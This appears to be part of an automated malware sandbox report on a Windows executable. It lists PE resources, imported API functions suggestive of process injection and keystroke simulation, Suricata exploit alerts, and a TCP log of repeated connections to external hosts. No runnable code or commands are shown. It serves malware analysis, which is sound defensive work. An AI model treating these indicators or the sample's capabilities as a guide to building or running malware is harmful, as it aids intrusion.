RT_STRING | 0xdb110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xdb5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xdbb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xdc1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xdc660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xdc7b8 | 0xa8480 | data | (none) | (none) | 1.0003206244196843
RT_GROUP_ICON | 0x184c38 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x184cb0 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x184cc4 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x184cd8 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x184cec | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x184dc8 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll | HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll | DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentThread, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, EnterCriticalSection, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll | IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, TranslateMessage, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, GetKeyboardLayoutNameW, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, GetMessageW, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, ReleaseDC, GetDC, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, ClientToScreen, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, TrackPopupMenuEx, BlockInput, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, LockWindowUpdate, keybd_event, DispatchMessageW, ScreenToClient
GDI32.dll | EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll | DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll | CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
Language of compilation system | Country where language is spoken | Map
English | Great Britain | (map image not reproduced)
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-12T08:51:57.429971+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 52.149.20.212 | 443 | 192.168.2.4 | 49730 | TCP
2024-11-12T08:52:35.768193+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 52.149.20.212 | 443 | 192.168.2.4 | 49741 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 12, 2024 08:52:08.156316996 CET | 49736 | 80 | 192.168.2.4 | 3.33.130.190
Nov 12, 2024 08:52:08.162252903 CET | 80 | 49736 | 3.33.130.190 | 192.168.2.4
Nov 12, 2024 08:52:08.162336111 CET | 49736 | 80 | 192.168.2.4 | 3.33.130.190
Nov 12, 2024 08:52:08.170483112 CET | 49736 | 80 | 192.168.2.4 | 3.33.130.190
Nov 12, 2024 08:52:08.175384045 CET | 80 | 49736 | 3.33.130.190 | 192.168.2.4
Nov 12, 2024 08:52:08.804238081 CET | 80 | 49736 | 3.33.130.190 | 192.168.2.4
Nov 12, 2024 08:52:08.804701090 CET | 80 | 49736 | 3.33.130.190 | 192.168.2.4
Nov 12, 2024 08:52:08.804753065 CET | 49736 | 80 | 192.168.2.4 | 3.33.130.190
Nov 12, 2024 08:52:08.807779074 CET | 49736 | 80 | 192.168.2.4 | 3.33.130.190
Nov 12, 2024 08:52:08.812557936 CET | 80 | 49736 | 3.33.130.190 | 192.168.2.4
Nov 12, 2024 08:52:23.917131901 CET | 49737 | 80 | 192.168.2.4 | 217.70.184.50
Nov 12, 2024 08:52:23.921960115 CET | 80 | 49737 | 217.70.184.50 | 192.168.2.4
Nov 12, 2024 08:52:23.922039986 CET | 49737 | 80 | 192.168.2.4 | 217.70.184.50
Nov 12, 2024 08:52:23.933362007 CET | 49737 | 80 | 192.168.2.4 | 217.70.184.50
Nov 12, 2024 08:52:23.938276052 CET | 80 | 49737 | 217.70.184.50 | 192.168.2.4
Nov 12, 2024 08:52:24.748008966 CET | 80 | 49737 | 217.70.184.50 | 192.168.2.4
Nov 12, 2024 08:52:24.802269936 CET | 49737 | 80 | 192.168.2.4 | 217.70.184.50
Nov 12, 2024 08:52:24.858531952 CET | 80 | 49737 | 217.70.184.50 | 192.168.2.4
Nov 12, 2024 08:52:24.858593941 CET | 49737 | 80 | 192.168.2.4 | 217.70.184.50
Nov 12, 2024 08:52:25.442981005 CET | 49737 | 80 | 192.168.2.4 | 217.70.184.50
Nov 12, 2024 08:52:26.502959013 CET | 49738 | 80 | 192.168.2.4 | 217.70.184.50
Nov 12, 2024 08:52:26.507930994 CET | 80 | 49738 | 217.70.184.50 | 192.168.2.4
Nov 12, 2024 08:52:26.508034945 CET | 49738 | 80 | 192.168.2.4 | 217.70.184.50
Nov 12, 2024 08:52:26.546372890 CET | 49738 | 80 | 192.168.2.4 | 217.70.184.50
Nov 12, 2024 08:52:26.551234961 CET | 80 | 49738 | 217.70.184.50 | 192.168.2.4
Nov 12, 2024 08:52:27.325246096 CET | 80 | 49738 | 217.70.184.50 | 192.168.2.4
Nov 12, 2024 08:52:27.380418062 CET | 49738 | 80 | 192.168.2.4 | 217.70.184.50
Nov 12, 2024 08:52:27.433131933 CET | 80 | 49738 | 217.70.184.50 | 192.168.2.4
Nov 12, 2024 08:52:27.433223009 CET | 49738 | 80 | 192.168.2.4 | 217.70.184.50
Nov 12, 2024 08:52:28.052319050 CET | 49738 | 80 | 192.168.2.4 | 217.70.184.50
Nov 12, 2024 08:52:29.123562098 CET | 49739 | 80 | 192.168.2.4 | 217.70.184.50
Nov 12, 2024 08:52:29.128513098 CET | 80 | 49739 | 217.70.184.50 | 192.168.2.4
Nov 12, 2024 08:52:29.128602982 CET | 49739 | 80 | 192.168.2.4 | 217.70.184.50
Nov 12, 2024 08:52:29.139610052 CET | 49739 | 80 | 192.168.2.4 | 217.70.184.50
Nov 12, 2024 08:52:29.144541979 CET | 80 | 49739 | 217.70.184.50 | 192.168.2.4
Nov 12, 2024 08:52:29.144689083 CET | 80 | 49739 | 217.70.184.50 | 192.168.2.4
Nov 12, 2024 08:52:29.144699097 CET | 80 | 49739 | 217.70.184.50 | 192.168.2.4
Nov 12, 2024 08:52:29.144723892 CET | 80 | 49739 | 217.70.184.50 | 192.168.2.4
Nov 12, 2024 08:52:29.144732952 CET | 80 | 49739 | 217.70.184.50 | 192.168.2.4
Nov 12, 2024 08:52:29.144756079 CET | 80 | 49739 | 217.70.184.50 | 192.168.2.4
Nov 12, 2024 08:52:29.144764900 CET | 80 | 49739 | 217.70.184.50 | 192.168.2.4
Nov 12, 2024 08:52:29.144879103 CET | 80 | 49739 | 217.70.184.50 | 192.168.2.4
Nov 12, 2024 08:52:29.144917011 CET | 80 | 49739 | 217.70.184.50 | 192.168.2.4
Nov 12, 2024 08:52:29.984438896 CET | 80 | 49739 | 217.70.184.50 | 192.168.2.4
Nov 12, 2024 08:52:30.036655903 CET | 49739 | 80 | 192.168.2.4 | 217.70.184.50
Nov 12, 2024 08:52:30.094999075 CET | 80 | 49739 | 217.70.184.50 | 192.168.2.4
Nov 12, 2024 08:52:30.095076084 CET | 49739 | 80 | 192.168.2.4 | 217.70.184.50
Nov 12, 2024 08:52:30.646100044 CET | 49739 | 80 | 192.168.2.4 | 217.70.184.50
Nov 12, 2024 08:52:31.664469957 CET | 49740 | 80 | 192.168.2.4 | 217.70.184.50
Nov 12, 2024 08:52:31.669425011 CET | 80 | 49740 | 217.70.184.50 | 192.168.2.4
Nov 12, 2024 08:52:31.669502974 CET | 49740 | 80 | 192.168.2.4 | 217.70.184.50
Nov 12, 2024 08:52:31.676389933 CET | 49740 | 80 | 192.168.2.4 | 217.70.184.50
Nov 12, 2024 08:52:31.681183100 CET | 80 | 49740 | 217.70.184.50 | 192.168.2.4
Nov 12, 2024 08:52:32.486896038 CET | 80 | 49740 | 217.70.184.50 | 192.168.2.4
Nov 12, 2024 08:52:32.486912966 CET | 80 | 49740 | 217.70.184.50 | 192.168.2.4
Nov 12, 2024 08:52:32.486921072 CET | 80 | 49740 | 217.70.184.50 | 192.168.2.4
Nov 12, 2024 08:52:32.487227917 CET | 49740 | 80 | 192.168.2.4 | 217.70.184.50
Nov 12, 2024 08:52:32.597651005 CET | 80 | 49740 | 217.70.184.50 | 192.168.2.4
Nov 12, 2024 08:52:32.597846031 CET | 49740 | 80 | 192.168.2.4 | 217.70.184.50
Nov 12, 2024 08:52:32.601336002 CET | 49740 | 80 | 192.168.2.4 | 217.70.184.50
Nov 12, 2024 08:52:32.606988907 CET | 80 | 49740 | 217.70.184.50 | 192.168.2.4
Nov 12, 2024 08:52:37.858609915 CET | 49742 | 80 | 192.168.2.4 | 199.59.243.227
Nov 12, 2024 08:52:37.863435984 CET | 80 | 49742 | 199.59.243.227 | 192.168.2.4
Nov 12, 2024 08:52:37.863527060 CET | 49742 | 80 | 192.168.2.4 | 199.59.243.227
Nov 12, 2024 08:52:37.872726917 CET | 49742 | 80 | 192.168.2.4 | 199.59.243.227
Nov 12, 2024 08:52:37.877557039 CET | 80 | 49742 | 199.59.243.227 | 192.168.2.4
Nov 12, 2024 08:52:38.480180979 CET | 80 | 49742 | 199.59.243.227 | 192.168.2.4
Nov 12, 2024 08:52:38.480201006 CET | 80 | 49742 | 199.59.243.227 | 192.168.2.4
Nov 12, 2024 08:52:38.480268955 CET | 49742 | 80 | 192.168.2.4 | 199.59.243.227
Nov 12, 2024 08:52:38.480402946 CET | 80 | 49742 | 199.59.243.227 | 192.168.2.4
Nov 12, 2024 08:52:38.480452061 CET | 49742 | 80 | 192.168.2.4 | 199.59.243.227
Nov 12, 2024 08:52:39.380508900 CET | 49742 | 80 | 192.168.2.4 | 199.59.243.227
Nov 12, 2024 08:52:40.399338961 CET | 49749 | 80 | 192.168.2.4 | 199.59.243.227
Nov 12, 2024 08:52:40.404285908 CET | 80 | 49749 | 199.59.243.227 | 192.168.2.4
Nov 12, 2024 08:52:40.404387951 CET | 49749 | 80 | 192.168.2.4 | 199.59.243.227
Nov 12, 2024 08:52:40.414700985 CET | 49749 | 80 | 192.168.2.4 | 199.59.243.227
Nov 12, 2024 08:52:40.419558048 CET | 80 | 49749 | 199.59.243.227 | 192.168.2.4
Nov 12, 2024 08:52:41.028640985 CET | 80 | 49749 | 199.59.243.227 | 192.168.2.4
Nov 12, 2024 08:52:41.028656006 CET | 80 | 49749 | 199.59.243.227 | 192.168.2.4
Nov 12, 2024 08:52:41.028718948 CET | 49749 | 80 | 192.168.2.4 | 199.59.243.227
Nov 12, 2024 08:52:41.029556990 CET | 80 | 49749 | 199.59.243.227 | 192.168.2.4
Nov 12, 2024 08:52:41.029603958 CET | 49749 | 80 | 192.168.2.4 | 199.59.243.227
Nov 12, 2024 08:52:41.927387953 CET | 49749 | 80 | 192.168.2.4 | 199.59.243.227
Nov 12, 2024 08:52:42.953668118 CET | 49765 | 80 | 192.168.2.4 | 199.59.243.227
Nov 12, 2024 08:52:42.958678007 CET | 80 | 49765 | 199.59.243.227 | 192.168.2.4
Nov 12, 2024 08:52:42.958988905 CET | 49765 | 80 | 192.168.2.4 | 199.59.243.227
Nov 12, 2024 08:52:42.970439911 CET | 49765 | 80 | 192.168.2.4 | 199.59.243.227
Nov 12, 2024 08:52:42.975472927 CET | 80 | 49765 | 199.59.243.227 | 192.168.2.4
Nov 12, 2024 08:52:42.975513935 CET | 80 | 49765 | 199.59.243.227 | 192.168.2.4
Nov 12, 2024 08:52:42.976855993 CET | 80 | 49765 | 199.59.243.227 | 192.168.2.4
Nov 12, 2024 08:52:42.976923943 CET | 80 | 49765 | 199.59.243.227 | 192.168.2.4
Nov 12, 2024 08:52:42.977052927 CET | 80 | 49765 | 199.59.243.227 | 192.168.2.4
Nov 12, 2024 08:52:42.977061987 CET | 80 | 49765 | 199.59.243.227 | 192.168.2.4
Nov 12, 2024 08:52:42.977569103 CET | 80 | 49765 | 199.59.243.227 | 192.168.2.4
Nov 12, 2024 08:52:42.977621078 CET | 80 | 49765 | 199.59.243.227 | 192.168.2.4
Nov 12, 2024 08:52:42.977629900 CET | 80 | 49765 | 199.59.243.227 | 192.168.2.4
Nov 12, 2024 08:52:43.575428963 CET | 80 | 49765 | 199.59.243.227 | 192.168.2.4
Nov 12, 2024 08:52:43.575443983 CET | 80 | 49765 | 199.59.243.227 | 192.168.2.4
Nov 12, 2024 08:52:43.575517893 CET | 49765 | 80 | 192.168.2.4 | 199.59.243.227
Nov 12, 2024 08:52:43.576086998 CET | 80 | 49765 | 199.59.243.227 | 192.168.2.4
Nov 12, 2024 08:52:43.576142073 CET | 49765 | 80 | 192.168.2.4 | 199.59.243.227
Nov 12, 2024 08:52:44.474245071 CET | 49765 | 80 | 192.168.2.4 | 199.59.243.227
Nov 12, 2024 08:52:45.493109941 CET | 49780 | 80 | 192.168.2.4 | 199.59.243.227
Nov 12, 2024 08:52:45.497956038 CET | 80 | 49780 | 199.59.243.227 | 192.168.2.4
Nov 12, 2024 08:52:45.498121023 CET | 49780 | 80 | 192.168.2.4 | 199.59.243.227
Nov 12, 2024 08:52:45.504862070 CET | 49780 | 80 | 192.168.2.4 | 199.59.243.227
Nov 12, 2024 08:52:45.509721041 CET | 80 | 49780 | 199.59.243.227 | 192.168.2.4
Nov 12, 2024 08:52:47.113971949 CET | 80 | 49780 | 199.59.243.227 | 192.168.2.4
Nov 12, 2024 08:52:47.113987923 CET | 80 | 49780 | 199.59.243.227 | 192.168.2.4
Nov 12, 2024 08:52:47.114268064 CET | 49780 | 80 | 192.168.2.4 | 199.59.243.227
Nov 12, 2024 08:52:47.114366055 CET | 80 | 49780 | 199.59.243.227 | 192.168.2.4
Nov 12, 2024 08:52:47.114411116 CET | 49780 | 80 | 192.168.2.4 | 199.59.243.227
Nov 12, 2024 08:52:47.117191076 CET | 49780 | 80 | 192.168.2.4 | 199.59.243.227
Nov 12, 2024 08:52:47.122093916 CET | 80 | 49780 | 199.59.243.227 | 192.168.2.4
Nov 12, 2024 08:52:52.579720974 CET | 49821 | 80 | 192.168.2.4 | 199.59.243.227
Nov 12, 2024 08:52:52.584537029 CET | 80 | 49821 | 199.59.243.227 | 192.168.2.4
Nov 12, 2024 08:52:52.584615946 CET | 49821 | 80 | 192.168.2.4 | 199.59.243.227
Nov 12, 2024 08:52:52.594949961 CET | 49821 | 80 | 192.168.2.4 | 199.59.243.227
Nov 12, 2024 08:52:52.599792004 CET | 80 | 49821 | 199.59.243.227 | 192.168.2.4
Nov 12, 2024 08:52:53.222028017 CET | 80 | 49821 | 199.59.243.227 | 192.168.2.4
Nov 12, 2024 08:52:53.222039938 CET | 80 | 49821 | 199.59.243.227 | 192.168.2.4
Nov 12, 2024 08:52:53.222090006 CET | 49821 | 80 | 192.168.2.4 | 199.59.243.227
Nov 12, 2024 08:52:53.222609043 CET | 80 | 49821 | 199.59.243.227 | 192.168.2.4
Nov 12, 2024 08:52:53.222647905 CET | 49821 | 80 | 192.168.2.4 | 199.59.243.227
Nov 12, 2024 08:52:54.099932909 CET | 49821 | 80 | 192.168.2.4 | 199.59.243.227
Nov 12, 2024 08:52:55.117440939 CET | 49837 | 80 | 192.168.2.4 | 199.59.243.227
Nov 12, 2024 08:52:55.122303009 CET | 80 | 49837 | 199.59.243.227 | 192.168.2.4
Nov 12, 2024 08:52:55.122365952 CET | 49837 | 80 | 192.168.2.4 | 199.59.243.227
Nov 12, 2024 08:52:55.131661892 CET | 49837 | 80 | 192.168.2.4 | 199.59.243.227
Nov 12, 2024 08:52:55.136595011 CET | 80 | 49837 | 199.59.243.227 | 192.168.2.4
Nov 12, 2024 08:52:55.756385088 CET | 80 | 49837 | 199.59.243.227 | 192.168.2.4
Nov 12, 2024 08:52:55.756422997 CET | 80 | 49837 | 199.59.243.227 | 192.168.2.4
Nov 12, 2024 08:52:55.756469965 CET | 49837 | 80 | 192.168.2.4 | 199.59.243.227
Nov 12, 2024 08:52:55.758161068 CET | 80 | 49837 | 199.59.243.227 | 192.168.2.4
Nov 12, 2024 08:52:55.758209944 CET | 49837 | 80 | 192.168.2.4 | 199.59.243.227
Nov 12, 2024 08:52:56.646122932 CET | 49837 | 80 | 192.168.2.4 | 199.59.243.227
Nov 12, 2024 08:52:57.664503098 CET | 49852 | 80 | 192.168.2.4 | 199.59.243.227
Nov 12, 2024 08:52:57.669431925 CET | 80 | 49852 | 199.59.243.227 | 192.168.2.4
Nov 12, 2024 08:52:57.669507980 CET | 49852 | 80 | 192.168.2.4 | 199.59.243.227
Nov 12, 2024 08:52:57.679811954 CET | 49852 | 80 | 192.168.2.4 | 199.59.243.227
Nov 12, 2024 08:52:57.684860945 CET | 80 | 49852 | 199.59.243.227 | 192.168.2.4
Nov 12, 2024 08:52:57.684905052 CET | 80 | 49852 | 199.59.243.227 | 192.168.2.4
Nov 12, 2024 08:52:57.684958935 CET | 80 | 49852 | 199.59.243.227 | 192.168.2.4
                                                                          Nov 12, 2024 08:52:57.684968948 CET8049852199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:57.685012102 CET8049852199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:57.685053110 CET8049852199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:57.685091019 CET8049852199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:57.685100079 CET8049852199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:57.685142040 CET8049852199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:58.297275066 CET8049852199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:58.297287941 CET8049852199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:58.297328949 CET4985280192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:52:58.297768116 CET8049852199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:58.297811985 CET4985280192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:52:59.194267035 CET4985280192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:53:00.211694002 CET4986880192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:53:00.216674089 CET8049868199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:53:00.216748953 CET4986880192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:53:00.223387957 CET4986880192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:53:00.228266954 CET8049868199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:53:00.876884937 CET8049868199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:53:00.876898050 CET8049868199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:53:00.877037048 CET4986880192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:53:00.877362013 CET8049868199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:53:00.878160954 CET4986880192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:53:00.879267931 CET4986880192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:53:00.884229898 CET8049868199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:53:05.904844046 CET4989780192.168.2.4209.74.64.58
                                                                          Nov 12, 2024 08:53:05.909682035 CET8049897209.74.64.58192.168.2.4
                                                                          Nov 12, 2024 08:53:05.909739971 CET4989780192.168.2.4209.74.64.58
                                                                          Nov 12, 2024 08:53:05.922686100 CET4989780192.168.2.4209.74.64.58
                                                                          Nov 12, 2024 08:53:05.927512884 CET8049897209.74.64.58192.168.2.4
                                                                          Nov 12, 2024 08:53:06.577081919 CET8049897209.74.64.58192.168.2.4
                                                                          Nov 12, 2024 08:53:06.615195990 CET8049897209.74.64.58192.168.2.4
                                                                          Nov 12, 2024 08:53:06.615258932 CET4989780192.168.2.4209.74.64.58
                                                                          Nov 12, 2024 08:53:07.427459002 CET4989780192.168.2.4209.74.64.58
                                                                          Nov 12, 2024 08:53:08.446697950 CET4991280192.168.2.4209.74.64.58
                                                                          Nov 12, 2024 08:53:08.451499939 CET8049912209.74.64.58192.168.2.4
                                                                          Nov 12, 2024 08:53:08.451663017 CET4991280192.168.2.4209.74.64.58
                                                                          Nov 12, 2024 08:53:08.462522030 CET4991280192.168.2.4209.74.64.58
                                                                          Nov 12, 2024 08:53:08.467303991 CET8049912209.74.64.58192.168.2.4
                                                                          Nov 12, 2024 08:53:09.133166075 CET8049912209.74.64.58192.168.2.4
